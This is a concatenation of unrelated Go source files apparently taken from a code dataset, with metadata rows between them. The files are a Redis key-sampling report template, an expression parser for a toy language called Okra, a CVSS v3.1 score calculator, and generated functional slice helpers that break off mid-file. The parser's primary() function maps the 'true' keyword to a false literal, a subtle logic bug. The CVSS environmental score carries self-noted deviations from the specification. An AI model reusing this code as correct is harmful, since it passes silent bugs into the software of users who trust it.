package reckon
const (
	// statsTempl is the text/template used to render the sampled-key report,
	// one section per Redis data type (strings, sets, sorted sets, hashes,
	// lists). It relies on template helper funcs registered by the caller:
	// summarize, stats, power, fmtFloat and percentage.
	statsTempl = `
{{define "base"}}
# of keys sampled: {{.KeyCount}}
{{ if .StringKeys }}
--- Strings ({{summarize .StringSizes}}) ---
{{template "exampleKeys" .StringKeys}}
{{template "exampleValues" .StringValues}}
Sizes ({{template "stats" .StringSizes}}):
{{template "freq" .StringSizes}}
^2 Sizes:{{template "freq" power .StringSizes}}{{end}}
{{ if .SetKeys }}
--- Sets ({{summarize .SetSizes}}) ---
{{template "exampleKeys" .SetKeys}}
Sizes ({{template "stats" .SetSizes}}):
{{template "freq" .SetSizes}}
^2 Sizes:{{template "freq" power .SetSizes}}
{{template "exampleElements" .SetElements}}
Element Sizes:{{template "freq" .SetElementSizes}}
Element ^2 Sizes:{{template "freq" power .SetElementSizes}}{{end}}
{{ if .SortedSetKeys }}
--- Sorted Sets ({{summarize .SortedSetSizes}}) ---
{{template "exampleKeys" .SortedSetKeys}}
Sizes ({{template "stats" .SortedSetSizes}}):
{{template "freq" .SortedSetSizes}}
^2 Sizes:{{template "freq" power .SortedSetSizes}}
{{template "exampleElements" .SortedSetElements}}
Element Sizes ({{template "stats" .SortedSetElementSizes}}):
{{template "freq" .SortedSetElementSizes}}
Element ^2 Sizes:{{template "freq" power .SortedSetElementSizes}}{{end}}
{{ if .HashKeys }}
--- Hashes ({{summarize .HashSizes}}) ---
{{template "exampleKeys" .HashKeys}}
Sizes ({{template "stats" .HashSizes}}):
{{template "freq" .HashSizes}}
^2 Sizes:{{template "freq" power .HashSizes}}
{{template "exampleElements" .HashElements}}
Element Sizes ({{template "stats" .HashElementSizes}}):
{{template "freq" .HashElementSizes}}
^2 Element Sizes:{{template "freq" power .HashElementSizes}}
{{template "exampleValues" .HashValues}}
Value Sizes ({{template "stats" .HashValueSizes}}):
{{template "freq" .HashValueSizes}}
^2 Value Sizes:{{template "freq" power .HashValueSizes}}{{end}}
{{ if .ListKeys }}
--- Lists ({{summarize .ListSizes}}) ---
{{template "exampleKeys" .ListKeys}}
Sizes ({{template "stats" .ListSizes}}):
{{template "freq" .ListSizes}}
^2 Sizes:{{template "freq" power .ListSizes}}
{{template "exampleElements" .ListElements}}
Element Sizes ({{template "stats" .ListElementSizes}}):
{{template "freq" .ListElementSizes}}
^2 Element Sizes{{template "freq" power .ListElementSizes}}
{{end}}{{end}}
{{define "stats"}}{{ with stats . }}min: {{.Min}} max: {{.Max}} mean: {{fmtFloat .Mean}} std dev: {{fmtFloat .StdDev}}{{end}}{{end}}
{{define "exampleKeys"}}Example Keys:
{{range $k, $v := .}}  {{$k}}
{{end}}{{end}}
{{define "exampleValues"}}Example Values:
{{range $k, $v := .}}  {{$k}}
{{end}}{{end}}
{{define "exampleElements"}}Example Elements:
{{range $k, $v := .}}  {{$k}}
{{end}}{{end}}
{{define "freq"}}
{{ $ss := summarize . }}{{ range $s, $c := .}} {{$s}}: {{$c}} ({{percentage $c $ss }})
{{end}}{{end}}
`
)
package parse
import (
"github.com/cdkini/Okra/src/interpreter/ast"
"github.com/cdkini/Okra/src/okraerr"
)
// Expression parses a single expression using recursive descent, starting at
// the lowest-precedence rule (assignment) and descending through the
// precedence levels until a grammar rule is matched. It is the entry point
// used both for bare expressions and for statements that embed an Expr.
//
// Returns: an Expr that fits the EBNF / context-free grammar rules as set by Okra.
func (p *Parser) Expression() ast.Expr {
	return p.assignment()
}
// assignment parses an assignment (":") when present; otherwise it yields
// the parsed logical-or expression unchanged. Valid assignment targets are
// plain variables and property accesses; anything else is reported as an
// error at the current token.
func (p *Parser) assignment() ast.Expr {
	target := p.or()
	if !p.match(ast.Colon) {
		return target
	}
	prev := p.prevToken()
	value := p.assignment() // right-associative: a : b : c parses as a : (b : c)
	switch target := target.(type) {
	case *ast.VariableExpr:
		return ast.NewAssignmentExpr(target.Identifier, value)
	case *ast.GetExpr:
		return ast.NewSetExpr(target.Object, target.Property, value)
	default:
		curr := p.currToken()
		okraerr.ReportErr(curr.Line, curr.Col, "Invalid assignment target: '"+prev.Lexeme+"'.")
	}
	return target
}
// or parses a left-associative chain of logical "or" expressions.
func (p *Parser) or() ast.Expr {
	left := p.and()
	for p.match(ast.Or) {
		op := p.prevToken()
		left = ast.NewLogicalExpr(left, op, p.and())
	}
	return left
}
// and parses a left-associative chain of logical "and" expressions, which
// bind tighter than "or".
func (p *Parser) and() ast.Expr {
	left := p.equality()
	for p.match(ast.And) {
		op := p.prevToken()
		left = ast.NewLogicalExpr(left, op, p.equality())
	}
	return left
}
// equality parses a left-associative chain of equality comparisons
// (equal / not-equal).
func (p *Parser) equality() ast.Expr {
	left := p.comparison()
	for p.match(ast.BangEqual, ast.Equal) {
		op := p.prevToken()
		left = ast.NewBinaryExpr(left, op, p.comparison())
	}
	return left
}
// comparison parses a left-associative chain of ordering comparisons
// (>, >=, <, <=).
func (p *Parser) comparison() ast.Expr {
	left := p.additionOrSubtraction()
	for p.match(ast.Greater, ast.GreaterEqual, ast.Less, ast.LessEqual) {
		op := p.prevToken()
		left = ast.NewBinaryExpr(left, op, p.additionOrSubtraction())
	}
	return left
}
// additionOrSubtraction parses a left-associative chain of additive
// expressions (+ / -).
func (p *Parser) additionOrSubtraction() ast.Expr {
	left := p.multiplicationOrDivision()
	for p.match(ast.Minus, ast.Plus) {
		op := p.prevToken()
		left = ast.NewBinaryExpr(left, op, p.multiplicationOrDivision())
	}
	return left
}
// multiplicationOrDivision parses a left-associative chain of multiplicative
// expressions (* and /), which bind tighter than additive ones.
func (p *Parser) multiplicationOrDivision() ast.Expr {
	left := p.unary()
	for p.match(ast.Slash, ast.Star) {
		op := p.prevToken()
		left = ast.NewBinaryExpr(left, op, p.unary())
	}
	return left
}
// unary parses a prefix "!" or "-" operator (right-associative, so "!!x"
// nests), falling through to a call expression otherwise.
func (p *Parser) unary() ast.Expr {
	if !p.match(ast.Bang, ast.Minus) {
		return p.call()
	}
	op := p.prevToken()
	return ast.NewUnaryExpr(op, p.unary())
}
// call parses a primary expression followed by any number of call argument
// lists ("(...)") and property accesses (".name"), in any interleaving.
func (p *Parser) call() ast.Expr {
	expr := p.primary()
	for {
		switch {
		case p.match(ast.LeftParen):
			expr = p.finishCall(expr)
		case p.match(ast.Dot):
			property := p.consume(ast.Identifier, "Expect property name after '.'.")
			expr = ast.NewGetExpr(expr, property)
		default:
			return expr
		}
	}
}
// finishCall consumes a (possibly empty) comma-separated argument list — the
// opening paren has already been matched by the caller — plus the closing
// paren, and builds the CallExpr.
func (p *Parser) finishCall(callee ast.Expr) ast.Expr {
	var args []ast.Expr
	if !p.check(ast.RightParen) {
		args = append(args, p.Expression())
		for p.match(ast.Comma) {
			args = append(args, p.Expression())
		}
	}
	paren := p.consume(ast.RightParen, "Expect ')' after function arguments.")
	return ast.NewCallExpr(callee, paren, args)
}
func (p *Parser) primary() ast.Expr {
switch {
case p.match(ast.False):
return ast.NewLiteralExpr(false)
case p.match(ast.True):
return ast.NewLiteralExpr(false)
case p.match(ast.Null):
return ast.NewLiteralExpr(nil)
case p.match(ast.Numeric):
return ast.NewLiteralExpr(p.prevToken().Literal)
case p.match(ast.String):
return ast.NewLiteralExpr(p.prevToken().Lexeme)
case p.match(ast.Identifier):
return ast.NewVariableExpr(p.prevToken())
case p.match(ast.This):
return ast.NewThisExpr(p.prevToken())
case p.match(ast.LeftParen):
expr := p.Expression()
p.consume(ast.RightParen, "Expect ')' after expression.")
return ast.NewGroupingExpr(expr)
default:
curr := p.currToken()
okraerr.ReportErr(curr.Line, curr.Col, "Expect expression.")
return nil
}
} | src/interpreter/parse/parser_expr.go | 0.73029 | 0.479016 | parser_expr.go | starcoder |
package api
import (
"fmt"
"math"
"regexp"
)
// cvssMetricWeights maps each CVSS v3 metric token (e.g. "AV:N") to its
// numeric weight as defined by the specification. The "PR:LC"/"PR:HC"
// entries (and the "MPR:" variants) are the Privileges Required weights
// used when Scope is Changed. Built once at package init instead of being
// reconstructed on every lookup.
var cvssMetricWeights = map[string]float64{
	"AV:N":   0.85,
	"AV:A":   0.62,
	"AV:L":   0.55,
	"AV:P":   0.2,
	"MAV:N":  0.85,
	"MAV:A":  0.62,
	"MAV:L":  0.55,
	"MAV:P":  0.2,
	"AC:L":   0.77,
	"AC:H":   0.44,
	"MAC:L":  0.77,
	"MAC:H":  0.44,
	"PR:N":   0.85,
	"PR:L":   0.62,
	"PR:LC":  0.68,
	"PR:H":   0.27,
	"PR:HC":  0.5,
	"MPR:N":  0.85,
	"MPR:L":  0.62,
	"MPR:LC": 0.68,
	"MPR:H":  0.27,
	"MPR:HC": 0.5,
	"UI:N":   0.85,
	"UI:R":   0.62,
	"MUI:N":  0.85,
	"MUI:R":  0.62,
	"C:H":    0.56,
	"C:L":    0.22,
	"C:N":    0,
	"MC:H":   0.56,
	"MC:L":   0.22,
	"MC:N":   0,
	"I:H":    0.56,
	"I:L":    0.22,
	"I:N":    0,
	"MI:H":   0.56,
	"MI:L":   0.22,
	"MI:N":   0,
	"A:H":    0.56,
	"A:L":    0.22,
	"A:N":    0,
	"MA:H":   0.56,
	"MA:L":   0.22,
	"MA:N":   0,
	"E:X":    1,
	"E:H":    1,
	"E:F":    0.97,
	"E:P":    0.94,
	"E:U":    0.91,
	"RL:X":   1,
	"RL:U":   1,
	"RL:W":   0.97,
	"RL:T":   0.96,
	"RL:O":   0.95,
	"RC:X":   1,
	"RC:C":   1,
	"RC:R":   0.96,
	"RC:U":   0.92,
}

// getMetricValue returns the CVSS weight for the given metric token, or 0
// when the token is unknown.
func getMetricValue(key string) float64 {
	return cvssMetricWeights[key]
}
// baseMetricRe extracts the eight base-metric tokens (AV, AC, PR, UI, S, C,
// I, A) from a CVSS v3 vector string. Compiled once at package init rather
// than on every call.
var baseMetricRe = regexp.MustCompile(`(AV|AC|PR|UI|S|C|I|A):[A-Z]{1,2}`)

// BaseScore computes the CVSS v3.1 base score from the vector string,
// rounded up ("roundup" in the spec) to one decimal place.
func BaseScore(cvss string) float64 {
	metricSections := baseMetricRe.FindAllString(cvss, -1)
	s := metricSections[4] // scope: "S:U" (unchanged) or "S:C" (changed)
	av := getMetricValue(metricSections[0])
	ac := getMetricValue(metricSections[1])
	// Privileges Required weighs higher when scope is changed; the
	// changed-scope weights are stored under the "...C" suffixed keys.
	var pr float64
	if s == "S:C" && metricSections[2] != "PR:N" {
		pr = getMetricValue(metricSections[2] + "C")
	} else {
		pr = getMetricValue(metricSections[2])
	}
	ui := getMetricValue(metricSections[3])
	c := getMetricValue(metricSections[5])
	i := getMetricValue(metricSections[6])
	a := getMetricValue(metricSections[7])
	iss := 1 - ((1 - c) * (1 - i) * (1 - a))
	var impact float64
	if s == "S:U" {
		impact = 6.42 * iss
	} else {
		impact = 7.52*(iss-0.029) - 3.25*math.Pow(iss-0.02, 15)
	}
	exploitability := 8.22 * av * ac * pr * ui
	if impact <= 0 {
		return 0
	}
	if s == "S:U" {
		return math.Ceil(math.Min(impact+exploitability, 10)*10) / 10
	}
	return math.Ceil(math.Min(1.08*(impact+exploitability), 10)*10) / 10
}
// temporalMetricRe extracts the temporal-metric tokens (E, RL, RC) from a
// CVSS v3 vector string. Compiled once at package init rather than on every
// call.
var temporalMetricRe = regexp.MustCompile(`(E|RL|RC):[A-Z]{1,2}`)

// TemporalScore computes the CVSS v3.1 temporal score by scaling the base
// score by the exploit-code-maturity (E), remediation-level (RL) and
// report-confidence (RC) weights, rounded up to one decimal place.
func TemporalScore(cvss string, baseScore float64) float64 {
	sections := temporalMetricRe.FindAllString(cvss, -1)
	e := getMetricValue(sections[0])
	rl := getMetricValue(sections[1])
	rc := getMetricValue(sections[2])
	return math.Ceil(baseScore*e*rl*rc*10) / 10
}
// requirementWeight returns the CVSS v3.1 weight for a security-requirement
// token (CR/IR/AR): High = 1.5, Low = 0.5, Medium and Not Defined (X) = 1.
// Handled locally because getMetricValue's table does not include these
// tokens (it returned 0 for them, zeroing every requirement).
func requirementWeight(token string) float64 {
	switch token[len(token)-1] {
	case 'H':
		return 1.5
	case 'L':
		return 0.5
	default: // ":M" and ":X" both weigh 1
		return 1
	}
}

// EnvironmentalScore computes the CVSS v3.1 environmental score from the
// modified base metrics (MAV/MAC/MPR/MUI/MS/MC/MI/MA), the security
// requirements (CR/IR/AR) and the temporal metrics (E/RL/RC) embedded in
// the vector string.
//
// NOTE(review): when MS is neither "MS:U" nor "MS:C" (e.g. "MS:X") the
// result is 0, although the spec says an undefined MS inherits the base
// Scope — confirm callers always supply an explicit MS. Likewise MPR is not
// scope-adjusted the way BaseScore adjusts PR — verify against the spec.
func EnvironmentalScore(cvss string) float64 {
	environmentalMetricSections := regexp.MustCompile(`(CR|IR|AR|MAV|MAC|MPR|MUI|MS|MC|MI|MA):[A-Z]{1,3}`).FindAllString(cvss, -1)
	cr := requirementWeight(environmentalMetricSections[0])
	ir := requirementWeight(environmentalMetricSections[1])
	ar := requirementWeight(environmentalMetricSections[2])
	mav := getMetricValue(environmentalMetricSections[3])
	mac := getMetricValue(environmentalMetricSections[4])
	mpr := getMetricValue(environmentalMetricSections[5])
	mui := getMetricValue(environmentalMetricSections[6])
	ms := environmentalMetricSections[7]
	mc := getMetricValue(environmentalMetricSections[8])
	mi := getMetricValue(environmentalMetricSections[9])
	ma := getMetricValue(environmentalMetricSections[10])
	temporalMetricSections := regexp.MustCompile(`(E|RL|RC):[A-Z]{1,2}`).FindAllString(cvss, -1)
	e := getMetricValue(temporalMetricSections[0])
	rl := getMetricValue(temporalMetricSections[1])
	rc := getMetricValue(temporalMetricSections[2])
	// MISS = min(1 - (1-CR*MC)(1-IR*MI)(1-AR*MA), 0.915) per the spec; the
	// previous code subtracted the requirement weights ("1-cr-mc") instead
	// of multiplying them into the impact sub-scores.
	miss := math.Min(1-((1-cr*mc)*(1-ir*mi)*(1-ar*ma)), 0.915)
	var modifiedImpact float64
	if ms == "MS:U" {
		modifiedImpact = 6.42 * miss
	} else if ms == "MS:C" {
		modifiedImpact = 7.52*(miss-0.029) - 3.25*math.Pow((miss*0.9731-0.02), 13)
	}
	modifiedExploitability := 8.22 * mav * mac * mpr * mui
	if modifiedImpact <= 0 {
		return 0
	}
	if ms == "MS:U" {
		return math.Ceil(((math.Ceil(math.Min((modifiedImpact+modifiedExploitability), 10)*10)/10)*e*rl*rc)*10) / 10
	}
	if ms == "MS:C" {
		return math.Ceil(((math.Ceil(math.Min(1.08*(modifiedImpact+modifiedExploitability), 10)*10)/10)*e*rl*rc)*10) / 10
	}
	return 0
}
// QualitativeSeverity maps a CVSS score onto its qualitative rating band:
// None (0), Low (0, 4), Medium [4, 7), High [7, 9) and Critical otherwise
// (which also covers out-of-range inputs such as negatives).
func QualitativeSeverity(score float64) string {
	switch {
	case score == 0:
		return "None"
	case score > 0 && score < 4:
		return "Low"
	case score >= 4 && score < 7:
		return "Medium"
	case score >= 7 && score < 9:
		return "High"
	default:
		return "Critical"
	}
}
// GetCVSSScore - Calculates CVSS scores and severities
func GetCVSSScore(cvss string) CVSSScore {
cvssScore := CVSSScore{}
cvssScore.BaseScore = BaseScore(cvss)
cvssScore.BaseSeverity = QualitativeSeverity(cvssScore.BaseScore)
cvssScore.TemporalScore = TemporalScore(cvss, cvssScore.BaseScore)
cvssScore.TemporalSeverity = QualitativeSeverity(cvssScore.TemporalScore)
cvssScore.EnvironmentalScore = EnvironmentalScore(cvss)
cvssScore.EnvironmentalSeverity = QualitativeSeverity(cvssScore.EnvironmentalScore)
return cvssScore
} | api/cvss.go | 0.544075 | 0.425546 | cvss.go | starcoder |
package fp
// intSlice is a []int that exposes chainable functional helpers
// (Map, Filter, Remove, DropWhile, TakeWhile, Reverse, Distinct).
type intSlice []int

// intFunctorForMap transforms one int element into another.
type intFunctorForMap func(int) int

// intFunctorForFilter reports whether an int element satisfies a predicate.
type intFunctorForFilter func(int) bool

// intSlicePtr is the []*int counterpart of intSlice.
type intSlicePtr []*int

// intFunctorForMapPtr transforms one *int element into another.
type intFunctorForMapPtr func(*int) *int

// intFunctorForFilterPtr reports whether a *int element satisfies a predicate.
type intFunctorForFilterPtr func(*int) bool

// MakeIntSlice creates a slice usable with the functional methods such as Map and Filter.
func MakeIntSlice(values ...int) intSlice {
	newSlice := intSlice(values)
	return newSlice
}

// Map applies each function, in order, to every item of the list and
// returns the resulting new list. Nil functions are skipped.
func (slice intSlice) Map(functors ...intFunctorForMap) intSlice {
	tmpSlice := slice
	for _, f := range functors {
		if f == nil {
			continue
		}
		tmpSlice = MapInt(f, tmpSlice)
	}
	return tmpSlice
}

// MakeIntSlicePtr creates a pointer slice usable with the functional methods such as MapPtr and FilterPtr.
func MakeIntSlicePtr(values ...*int) intSlicePtr {
	newSlice := intSlicePtr(values)
	return newSlice
}

// MapPtr applies each function, in order, to every item of the list and
// returns the resulting new list. Nil functions are skipped.
func (slice intSlicePtr) MapPtr(functors ...intFunctorForMapPtr) intSlicePtr {
	tmpSlice := slice
	for _, f := range functors {
		if f == nil {
			continue
		}
		tmpSlice = MapIntPtr(f, tmpSlice)
	}
	return tmpSlice
}

// Filter keeps only the items that satisfy every supplied predicate.
// Nil predicates are skipped.
func (slice intSlice) Filter(functors ...intFunctorForFilter) intSlice {
	tmpSlice := slice
	for _, f := range functors {
		if f == nil {
			continue
		}
		tmpSlice = FilterInt(f, tmpSlice)
	}
	return tmpSlice
}

// FilterPtr keeps only the items that satisfy every supplied predicate.
// Nil predicates are skipped.
func (slice intSlicePtr) FilterPtr(functors ...intFunctorForFilterPtr) intSlicePtr {
	tmpSlice := slice
	for _, f := range functors {
		if f == nil {
			continue
		}
		tmpSlice = FilterIntPtr(f, tmpSlice)
	}
	return tmpSlice
}

// Remove drops the items matched by the supplied predicates and returns the
// new list. Nil predicates are skipped.
func (slice intSlice) Remove(functors ...intFunctorForFilter) intSlice {
	tmpSlice := slice
	for _, f := range functors {
		if f == nil {
			continue
		}
		tmpSlice = RemoveInt(f, tmpSlice)
	}
	return tmpSlice
}

// RemovePtr drops the items matched by the supplied predicates and returns
// the new list. Nil predicates are skipped.
func (slice intSlicePtr) RemovePtr(functors ...intFunctorForFilterPtr) intSlicePtr {
	tmpSlice := slice
	for _, f := range functors {
		if f == nil {
			continue
		}
		tmpSlice = RemoveIntPtr(f, tmpSlice)
	}
	return tmpSlice
}

// DropWhile drops the items from the list as long as the condition holds.
// Nil predicates are skipped.
func (slice intSlice) DropWhile(functors ...intFunctorForFilter) intSlice {
	tmpSlice := slice
	for _, f := range functors {
		if f == nil {
			continue
		}
		tmpSlice = DropWhileInt(f, tmpSlice)
	}
	return tmpSlice
}

// DropWhilePtr drops the items from the list as long as the condition holds.
// Nil predicates are skipped.
func (slice intSlicePtr) DropWhilePtr(functors ...intFunctorForFilterPtr) intSlicePtr {
	tmpSlice := slice
	for _, f := range functors {
		if f == nil {
			continue
		}
		tmpSlice = DropWhileIntPtr(f, tmpSlice)
	}
	return tmpSlice
}

// Reverse returns the list in reverse order.
func (slice intSlice) Reverse() intSlice {
	return ReverseInts(slice)
}

// ReversePtr returns the list in reverse order.
func (slice intSlicePtr) ReversePtr() intSlicePtr {
	return ReverseIntsPtr(slice)
}

// Distinct returns the list with duplicates removed.
func (slice intSlice) Distinct() intSlice {
	return DistinctInt(slice)
}

// DistinctPtr returns the list with duplicates removed.
func (slice intSlicePtr) DistinctPtr() intSlicePtr {
	return DistinctIntPtr(slice)
}

// TakeWhile returns a new list of leading items taken while the predicates
// hold; it stops once a condition fails. Nil predicates are skipped.
func (slice intSlice) TakeWhile(functors ...intFunctorForFilter) intSlice {
	tmpSlice := slice
	for _, f := range functors {
		if f == nil {
			continue
		}
		tmpSlice = TakeWhileInt(f, tmpSlice)
	}
	return tmpSlice
}

// TakeWhilePtr returns a new list of leading items taken while the
// predicates hold; it stops once a condition fails. Nil predicates are skipped.
func (slice intSlicePtr) TakeWhilePtr(functors ...intFunctorForFilterPtr) intSlicePtr {
	tmpSlice := slice
	for _, f := range functors {
		if f == nil {
			continue
		}
		tmpSlice = TakeWhileIntPtr(f, tmpSlice)
	}
	return tmpSlice
}
// int64Slice is a []int64 that exposes chainable functional helpers
// (Map, Filter, Remove, DropWhile, TakeWhile, Reverse, Distinct).
type int64Slice []int64

// int64FunctorForMap transforms one int64 element into another.
type int64FunctorForMap func(int64) int64

// int64FunctorForFilter reports whether an int64 element satisfies a predicate.
type int64FunctorForFilter func(int64) bool

// int64SlicePtr is the []*int64 counterpart of int64Slice.
type int64SlicePtr []*int64

// int64FunctorForMapPtr transforms one *int64 element into another.
type int64FunctorForMapPtr func(*int64) *int64

// int64FunctorForFilterPtr reports whether a *int64 element satisfies a predicate.
type int64FunctorForFilterPtr func(*int64) bool

// MakeInt64Slice creates a slice usable with the functional methods such as Map and Filter.
func MakeInt64Slice(values ...int64) int64Slice {
	newSlice := int64Slice(values)
	return newSlice
}

// Map applies each function, in order, to every item of the list and
// returns the resulting new list. Nil functions are skipped.
func (slice int64Slice) Map(functors ...int64FunctorForMap) int64Slice {
	tmpSlice := slice
	for _, f := range functors {
		if f == nil {
			continue
		}
		tmpSlice = MapInt64(f, tmpSlice)
	}
	return tmpSlice
}

// MakeInt64SlicePtr creates a pointer slice usable with the functional methods such as MapPtr and FilterPtr.
func MakeInt64SlicePtr(values ...*int64) int64SlicePtr {
	newSlice := int64SlicePtr(values)
	return newSlice
}

// MapPtr applies each function, in order, to every item of the list and
// returns the resulting new list. Nil functions are skipped.
func (slice int64SlicePtr) MapPtr(functors ...int64FunctorForMapPtr) int64SlicePtr {
	tmpSlice := slice
	for _, f := range functors {
		if f == nil {
			continue
		}
		tmpSlice = MapInt64Ptr(f, tmpSlice)
	}
	return tmpSlice
}

// Filter keeps only the items that satisfy every supplied predicate.
// Nil predicates are skipped.
func (slice int64Slice) Filter(functors ...int64FunctorForFilter) int64Slice {
	tmpSlice := slice
	for _, f := range functors {
		if f == nil {
			continue
		}
		tmpSlice = FilterInt64(f, tmpSlice)
	}
	return tmpSlice
}

// FilterPtr keeps only the items that satisfy every supplied predicate.
// Nil predicates are skipped.
func (slice int64SlicePtr) FilterPtr(functors ...int64FunctorForFilterPtr) int64SlicePtr {
	tmpSlice := slice
	for _, f := range functors {
		if f == nil {
			continue
		}
		tmpSlice = FilterInt64Ptr(f, tmpSlice)
	}
	return tmpSlice
}

// Remove drops the items matched by the supplied predicates and returns the
// new list. Nil predicates are skipped.
func (slice int64Slice) Remove(functors ...int64FunctorForFilter) int64Slice {
	tmpSlice := slice
	for _, f := range functors {
		if f == nil {
			continue
		}
		tmpSlice = RemoveInt64(f, tmpSlice)
	}
	return tmpSlice
}

// RemovePtr drops the items matched by the supplied predicates and returns
// the new list. Nil predicates are skipped.
func (slice int64SlicePtr) RemovePtr(functors ...int64FunctorForFilterPtr) int64SlicePtr {
	tmpSlice := slice
	for _, f := range functors {
		if f == nil {
			continue
		}
		tmpSlice = RemoveInt64Ptr(f, tmpSlice)
	}
	return tmpSlice
}

// DropWhile drops the items from the list as long as the condition holds.
// Nil predicates are skipped.
func (slice int64Slice) DropWhile(functors ...int64FunctorForFilter) int64Slice {
	tmpSlice := slice
	for _, f := range functors {
		if f == nil {
			continue
		}
		tmpSlice = DropWhileInt64(f, tmpSlice)
	}
	return tmpSlice
}

// DropWhilePtr drops the items from the list as long as the condition holds.
// Nil predicates are skipped.
func (slice int64SlicePtr) DropWhilePtr(functors ...int64FunctorForFilterPtr) int64SlicePtr {
	tmpSlice := slice
	for _, f := range functors {
		if f == nil {
			continue
		}
		tmpSlice = DropWhileInt64Ptr(f, tmpSlice)
	}
	return tmpSlice
}

// Reverse returns the list in reverse order.
func (slice int64Slice) Reverse() int64Slice {
	return ReverseInts64(slice)
}

// ReversePtr returns the list in reverse order.
func (slice int64SlicePtr) ReversePtr() int64SlicePtr {
	return ReverseInts64Ptr(slice)
}

// Distinct returns the list with duplicates removed.
func (slice int64Slice) Distinct() int64Slice {
	return DistinctInt64(slice)
}

// DistinctPtr returns the list with duplicates removed.
func (slice int64SlicePtr) DistinctPtr() int64SlicePtr {
	return DistinctInt64Ptr(slice)
}

// TakeWhile returns a new list of leading items taken while the predicates
// hold; it stops once a condition fails. Nil predicates are skipped.
func (slice int64Slice) TakeWhile(functors ...int64FunctorForFilter) int64Slice {
	tmpSlice := slice
	for _, f := range functors {
		if f == nil {
			continue
		}
		tmpSlice = TakeWhileInt64(f, tmpSlice)
	}
	return tmpSlice
}

// TakeWhilePtr returns a new list of leading items taken while the
// predicates hold; it stops once a condition fails. Nil predicates are skipped.
func (slice int64SlicePtr) TakeWhilePtr(functors ...int64FunctorForFilterPtr) int64SlicePtr {
	tmpSlice := slice
	for _, f := range functors {
		if f == nil {
			continue
		}
		tmpSlice = TakeWhileInt64Ptr(f, tmpSlice)
	}
	return tmpSlice
}
// int32Slice is a []int32 that exposes chainable functional helpers
// (Map, Filter, Remove, DropWhile, TakeWhile, Reverse, Distinct).
type int32Slice []int32

// int32FunctorForMap transforms one int32 element into another.
type int32FunctorForMap func(int32) int32

// int32FunctorForFilter reports whether an int32 element satisfies a predicate.
type int32FunctorForFilter func(int32) bool

// int32SlicePtr is the []*int32 counterpart of int32Slice.
type int32SlicePtr []*int32

// int32FunctorForMapPtr transforms one *int32 element into another.
type int32FunctorForMapPtr func(*int32) *int32

// int32FunctorForFilterPtr reports whether a *int32 element satisfies a predicate.
type int32FunctorForFilterPtr func(*int32) bool

// MakeInt32Slice creates a slice usable with the functional methods such as Map and Filter.
func MakeInt32Slice(values ...int32) int32Slice {
	newSlice := int32Slice(values)
	return newSlice
}

// Map applies each function, in order, to every item of the list and
// returns the resulting new list. Nil functions are skipped.
func (slice int32Slice) Map(functors ...int32FunctorForMap) int32Slice {
	tmpSlice := slice
	for _, f := range functors {
		if f == nil {
			continue
		}
		tmpSlice = MapInt32(f, tmpSlice)
	}
	return tmpSlice
}

// MakeInt32SlicePtr creates a pointer slice usable with the functional methods such as MapPtr and FilterPtr.
func MakeInt32SlicePtr(values ...*int32) int32SlicePtr {
	newSlice := int32SlicePtr(values)
	return newSlice
}

// MapPtr applies each function, in order, to every item of the list and
// returns the resulting new list. Nil functions are skipped.
func (slice int32SlicePtr) MapPtr(functors ...int32FunctorForMapPtr) int32SlicePtr {
	tmpSlice := slice
	for _, f := range functors {
		if f == nil {
			continue
		}
		tmpSlice = MapInt32Ptr(f, tmpSlice)
	}
	return tmpSlice
}

// Filter keeps only the items that satisfy every supplied predicate.
// Nil predicates are skipped.
func (slice int32Slice) Filter(functors ...int32FunctorForFilter) int32Slice {
	tmpSlice := slice
	for _, f := range functors {
		if f == nil {
			continue
		}
		tmpSlice = FilterInt32(f, tmpSlice)
	}
	return tmpSlice
}

// FilterPtr keeps only the items that satisfy every supplied predicate.
// Nil predicates are skipped.
func (slice int32SlicePtr) FilterPtr(functors ...int32FunctorForFilterPtr) int32SlicePtr {
	tmpSlice := slice
	for _, f := range functors {
		if f == nil {
			continue
		}
		tmpSlice = FilterInt32Ptr(f, tmpSlice)
	}
	return tmpSlice
}

// Remove drops the items matched by the supplied predicates and returns the
// new list. Nil predicates are skipped.
func (slice int32Slice) Remove(functors ...int32FunctorForFilter) int32Slice {
	tmpSlice := slice
	for _, f := range functors {
		if f == nil {
			continue
		}
		tmpSlice = RemoveInt32(f, tmpSlice)
	}
	return tmpSlice
}

// RemovePtr drops the items matched by the supplied predicates and returns
// the new list. Nil predicates are skipped.
func (slice int32SlicePtr) RemovePtr(functors ...int32FunctorForFilterPtr) int32SlicePtr {
	tmpSlice := slice
	for _, f := range functors {
		if f == nil {
			continue
		}
		tmpSlice = RemoveInt32Ptr(f, tmpSlice)
	}
	return tmpSlice
}

// DropWhile drops the items from the list as long as the condition holds.
// Nil predicates are skipped.
func (slice int32Slice) DropWhile(functors ...int32FunctorForFilter) int32Slice {
	tmpSlice := slice
	for _, f := range functors {
		if f == nil {
			continue
		}
		tmpSlice = DropWhileInt32(f, tmpSlice)
	}
	return tmpSlice
}

// DropWhilePtr drops the items from the list as long as the condition holds.
// Nil predicates are skipped.
func (slice int32SlicePtr) DropWhilePtr(functors ...int32FunctorForFilterPtr) int32SlicePtr {
	tmpSlice := slice
	for _, f := range functors {
		if f == nil {
			continue
		}
		tmpSlice = DropWhileInt32Ptr(f, tmpSlice)
	}
	return tmpSlice
}

// Reverse returns the list in reverse order.
func (slice int32Slice) Reverse() int32Slice {
	return ReverseInts32(slice)
}

// ReversePtr returns the list in reverse order.
func (slice int32SlicePtr) ReversePtr() int32SlicePtr {
	return ReverseInts32Ptr(slice)
}

// Distinct returns the list with duplicates removed.
func (slice int32Slice) Distinct() int32Slice {
	return DistinctInt32(slice)
}

// DistinctPtr returns the list with duplicates removed.
func (slice int32SlicePtr) DistinctPtr() int32SlicePtr {
	return DistinctInt32Ptr(slice)
}

// TakeWhile returns a new list of leading items taken while the predicates
// hold; it stops once a condition fails. Nil predicates are skipped.
func (slice int32Slice) TakeWhile(functors ...int32FunctorForFilter) int32Slice {
	tmpSlice := slice
	for _, f := range functors {
		if f == nil {
			continue
		}
		tmpSlice = TakeWhileInt32(f, tmpSlice)
	}
	return tmpSlice
}

// TakeWhilePtr returns a new list of leading items taken while the
// predicates hold; it stops once a condition fails. Nil predicates are skipped.
func (slice int32SlicePtr) TakeWhilePtr(functors ...int32FunctorForFilterPtr) int32SlicePtr {
	tmpSlice := slice
	for _, f := range functors {
		if f == nil {
			continue
		}
		tmpSlice = TakeWhileInt32Ptr(f, tmpSlice)
	}
	return tmpSlice
}
// int16Slice is a []int16 that exposes chainable functional helpers
// (Map, Filter, Remove, ...).
type int16Slice []int16

